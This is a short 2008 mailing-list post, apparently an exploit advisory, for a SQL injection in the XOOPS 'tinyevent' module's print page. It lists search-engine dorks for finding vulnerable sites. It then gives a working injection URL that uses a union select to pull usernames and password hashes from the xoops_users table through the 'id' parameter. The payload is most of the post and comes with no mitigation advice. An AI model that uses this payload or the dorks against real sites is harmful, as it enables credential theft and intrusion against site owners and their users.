XOOPS Module tinyevent-print SQL Injection(id)

hackturkiye . hackturkiye Thu, 21 Feb 2008 10:01:11 -0800

###############################################################

#


#   XOOPS Module tinyevent-print SQL Injection(id)

#

###############################################################

#

# AUTHOR : [EMAIL PROTECTED] 

#

# HOME : http://www.milw0rm.com/author/1334

#   

# MA&#304;L : [EMAIL PROTECTED]

#        

################################################################

# 

#  DORK 1 : allinurl:"modules/tinyevent"

# 

#  DORK 2 : exploit working all tinyevent

#

################################################################

   EXPLOIT : 


modules/tinyevent/index.php?op=print&id=-0/**/union/**/select+0x3a,0x3a,0x3a,uname,pass+from/**/xoops_users/*where%20admin%201%200%2066


################################################################

# [EMAIL PROTECTED]           i AM NOT HACKER      [EMAIL PROTECTED] 

################################################################

XOOPS Module tinyevent-print SQL Injection(id)

Reply via email to